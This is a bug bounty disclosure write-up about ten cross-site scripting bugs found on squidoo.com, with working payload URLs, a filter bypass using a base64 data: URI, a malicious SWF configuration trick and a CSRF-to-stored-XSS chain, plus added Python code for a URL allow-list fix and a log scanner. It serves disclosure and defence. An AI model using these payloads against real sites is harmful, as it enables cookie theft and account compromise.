Being a student, any opportunity for some extra cash is always a good one to investigate. I stumbled across squidoo.com in my twitter feed. I noticed there were cash rewards, so I thought it was worth a poke around. I decided to give the application a full testing. In total I found 10 Xss bugs, which did indeed result in a reward and my name being added to the section of their site.
I'd like to thank squidoo.com for running their bug bounty program, as it may encourage others to do the same. It is also a very neat way of showing their users that they care about their safety. They were also very helpful and responsive through the whole disclosure process. In total I received rewards of $1,100, as I reported many fix bypasses/CSRF issues alongside the Xss below, for which I am immensely grateful.
Below I list the 10 bugs I found...
1. hq.squidoo.com Open-redirect Xss
2. www.squidoo.com charts.swf Xss
3. magazines.squidoo.com reflective Xss
4. Csrf/Xss www.squidoo.com Lens title
5. www.squidoo.com Xss Rss feed
6. www.squidoo.com Xss Rss feed in Widget
7. www.squidoo.com Xss via Image Link
8. Plupload Xss
9. Traffic Poisoning Xss
10. Forum post Xss
1. hq.squidoo.com Open-redirect Xss
This bug was at the following URL: http://hq.squidoo.com/wp-login.php?redirect_to=Malicious_Xss_or_Site Using a value of javascript:prompt%28document.domain,document.cookie%29; you were presented with the expected popup. This was first fixed using a blacklist, which I then bypassed, so it needed fixing again: using a value of data:text/html;base64,PGlmcmFtZSBvbmxvYWQ9cHJvbXB0KGRvY3VtZW50LmRvbWFpbiwiWHNzIik+ javascript execution was still possible.
2. www.squidoo.com charts.swf Xss
This swf was found in the source of one of the squidoo pages. I found the following information about charts.swf that helped me discover this bug. This bug involved reverse engineering the license key algorithm, as the free version of this product doesn't allow javascript execution from the url. Using my chartsPOC.xml I was able to replace the content of the swf with my own; you will notice the javascript in the url element of the xml.
This swf bug was located at http://www.squidoo.com/resources/charting/charts.swf?library_path=charts_library&php_source=https://makthepla.net/chartsPOC.xml&license= For obvious reasons I'm not describing the process of bypassing the license, as it is a commercial product, but the licence key was necessary for this bug to work. Upon being linked to our malicious swf url a victim would be presented with the following...
Upon clicking anywhere on the screen we get our javascript execution.
3. magazines.squidoo.com reflective Xss
This was simply data from a $_GET parameter being printed to the page without being sanitized. I can't quite remember how I found this URL... It was at the following location: http://magazines.squidoo.com/images/image.php?src=//%3Ciframe%20onload=prompt%28document.domain,document.cookie%29;%3E
4. Csrf/Xss www.squidoo.com Lens title
For this attack, all the attacker needs is the url of a lens. The lens I used as an example was http://www.squidoo.com/testing-squidoo-55465. The attacker crafts the following CSRF form, which submits to http://www.squidoo.com/workshop/ajax_save_title/testing-squidoo-55465. You can see that the end of this URL simply matches that of the lens being attacked.
If the attacker gets the owner of the lens to submit this form, the next time they go to edit their lens we get Xss execution, because the title html element isn't escaped correctly.
5. www.squidoo.com Xss Rss feed
On squidoo.com there is an option to include a remote RSS blog on your page. If I include the RSS feed located at https://makthepla.net/squidooPoc.rss I can get javascript execution via the Xml parameter. You will notice in this feed it is equal to javascript:prompt(document.domain,document.cookie)
The "POC XSS LINK" in blue in the following image is the result. Clicking it results in our Javascript execution.
6. www.squidoo.com Xss Rss feed in Widget
Similar to the bug above, we can also get Xss in the widget modules.
Clicking the "POC XSS LINK" on the widget located in the bottom right results in our expected popup.
7. www.squidoo.com Xss via Image Link
There is an option to include text/image content on your squidoo page. In the Image inclusion option there is a "Link the photo to this URL" field. Using a link containing the string data:text/html;base64,PGlmcmFtZSBvbmxvYWQ9cHJvbXB0KGRvY3VtZW50LmRvbWFpbiwiWHNzIik+ in this field, or simply javascript:alert(document.domain);
the following (the base64 encoded payload) is executed once the image is clicked, resulting in Xss.
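A server-side fix for the link fields behind bugs 1, 5, 6 and 7 above: an allow-list of URL schemes for stored links, and a host allow-list for a wp-login.php style redirect_to. This is an added example in Python, not squidoo's own code; ALLOWED_SCHEMES, the function names and the control-character stripping are my assumptions about how such a check would be written.

```python
import html
import re
from urllib.parse import urlsplit

# javascript: and data: are deliberately absent, so both the prompt() payload and
# its data:text/html;base64 bypass (decodes to <iframe onload=prompt(document.domain,"Xss")>) are refused.
ALLOWED_SCHEMES = {"http", "https"}

# Browsers drop control characters and whitespace before reading the scheme ("java\tscript:" runs).
_STRIP = re.compile(r"[\x00-\x20\x7f]")


def _clean_parts(url):
    """(cleaned url, urlsplit result); the result is None if it cannot be parsed."""
    cleaned = _STRIP.sub("", url)
    try:
        return cleaned, urlsplit(cleaned)
    except ValueError:  # e.g. an unbalanced '[' in the host part
        return cleaned, None


def safe_href(url):
    """The cleaned URL if it is relative or uses an allowed scheme, else None."""
    cleaned, parts = _clean_parts(url)
    if parts is None:
        return None
    scheme = parts.scheme.lower()
    return cleaned if scheme == "" or scheme in ALLOWED_SCHEMES else None


def render_link(url, text):
    """HTML for a user-supplied link (RSS item link, 'Link the photo to this URL').
    Attribute and text are both escaped; a refused URL is shown as plain text, not a link."""
    href = safe_href(url)
    if href is None:
        return html.escape(text)
    return '<a href="{}">{}</a>'.format(html.escape(href, quote=True), html.escape(text))


def is_safe_redirect(redirect_to, allowed_hosts):
    """Allow-list check for redirect_to: a local absolute path, or an http(s) URL
    whose host is explicitly permitted. Everything else (javascript:, data:, other hosts) fails."""
    cleaned, parts = _clean_parts(redirect_to)
    if parts is None:
        return False
    if parts.scheme == "" and parts.netloc == "":
        # "//host" parses with a netloc and never reaches here, but browsers also read
        # "/\host" as protocol-relative, so reject a second slash or a backslash too.
        return cleaned.startswith("/") and cleaned[1:2] not in ("/", "\\")
    return parts.scheme.lower() in ALLOWED_SCHEMES and parts.hostname in allowed_hosts
```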
8. Plupload Xss
The site used an old version of plupload that is vulnerable to Xss via the id parameter. If you accessed the following url http://www.squidoo.com/scripts/squidoo/lib/plupload/plupload.flash.swf?id=0\%22%29%29}catch%28e%29{prompt%28document.domain,document.cookie%29}// you would get the expected javascript execution. This vulnerability had been found before I reported it, so I wasn't eligible for a reward for this one.
9. Traffic Poisoning Xss
This allows an attacker to poison the traffic stats for any Lens, resulting in an XSS. First I created a new Lens, "Example Lens 2", located at http://www.squidoo.com/example-lens-2?showme Below you can see the empty traffic stats for this Lens, located at http://www.squidoo.com/stats/traffic/example-lens-2
You will notice that under the clickouts there are no values available. If I visit my page as a regular user and click on any link or url, I notice that each url is tracked via ajax at the following url: http://www.squidoo.com/track/ajax_click?&lens_id=21343241&url=THE CLICKED LINK In the image below I clicked a link on my page to https://makthepla.net and I notice in Tamper Data (a tool used to monitor requests) that this URL is tracked.
I can then view this in the traffic stats page as seen below.
However, if I visit the following URL http://www.squidoo.com/track/ajax_click?&lens_id=21343241&url="> (notice the javascript!) I can store Xss instead of a Url in the victim Lens's traffic statistics. An example of what happens when I visit the stats page now is below.
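A defender-side complement to bugs 1, 3 and 9: a small scanner that flags access-log requests whose URL-type parameters carry an executable scheme or HTML metacharacters after decoding. This is an added example, not from the original post or from squidoo; the log lines are constructed (TEST-NET addresses) and the parameter list is an assumption drawn from the URLs above.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample in Apache combined log format (not real squidoo traffic):
# a normal clickout, a poisoned clickout, both redirect_to payloads, a benign redirect.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Feb/2013:10:00:01 +0000] "GET /track/ajax_click?&lens_id=21343241&url=https://makthepla.net HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Feb/2013:10:00:09 +0000] "GET /track/ajax_click?&lens_id=21343241&url=%22%3E%3Ciframe%20onload=prompt(document.domain)%3E HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Feb/2013:10:01:00 +0000] "GET /wp-login.php?redirect_to=javascript:prompt%28document.domain,document.cookie%29; HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Feb/2013:10:01:05 +0000] "GET /wp-login.php?redirect_to=data:text/html;base64,PGlmcmFtZSBvbmxvYWQ9cHJvbXB0KGRvY3VtZW50LmRvbWFpbiwiWHNzIik+ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Feb/2013:10:02:00 +0000] "GET /wp-login.php?redirect_to=/wp-admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*"')
# Parameters that bugs 1, 3 and 9 above showed being echoed or stored as a URL (assumed list).
URL_PARAMS = {"redirect_to", "url", "src", "php_source"}
_EXEC_SCHEME = re.compile(r"^(javascript|data|vbscript):", re.I)
_MARKUP = re.compile(r"""[<>"']""")
_CTRL = re.compile(r"[\x00-\x20\x7f]")  # browsers ignore these inside a scheme


def classify(value):
    """Why a decoded parameter value is suspicious, or None if it looks like a plain URL."""
    value = unquote(value)  # second decode pass catches double-encoded payloads
    if _EXEC_SCHEME.search(_CTRL.sub("", value)):
        return "executable scheme"
    if _MARKUP.search(value):
        return "html metacharacters"
    return None


def suspicious_params(target):
    """(param, reason) for every URL-type parameter of a request target."""
    found = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        reason = classify(value) if name in URL_PARAMS else None
        if reason:
            found.append((name, reason))
    return found


def scan_log(text):
    """(ip, timestamp, param, reason) for each suspicious request in the log."""
    hits = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if m:
            for name, reason in suspicious_params(m["target"]):
                hits.append((m["ip"], m["ts"], name, reason))
    return hits
```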
10. Forum post Xss
This Xss occurred on the hq.squidoo.com forum. It involved finding the location http://magazines.squidoo.com/wp-admin/profile.php and including some simple proof-of-concept javascript as a forum signature, which was then included in every forum post I made. I used a simple vector of confirm(1) to verify it worked. Below you will see the included poc html.
I then made a test post to the forums to confirm it worked. The result can be seen below...
I also made the squidoo admins aware of many CSRF bugs, but they were already aware of these and were in the process of fixing them. These were also beyond the scope of the bug bounty program. I hope you find the information above interesting. If you are interested in having me test your web application for bugs or common security issues, please contact me via any of the contact points at https://makthepla.net/contact/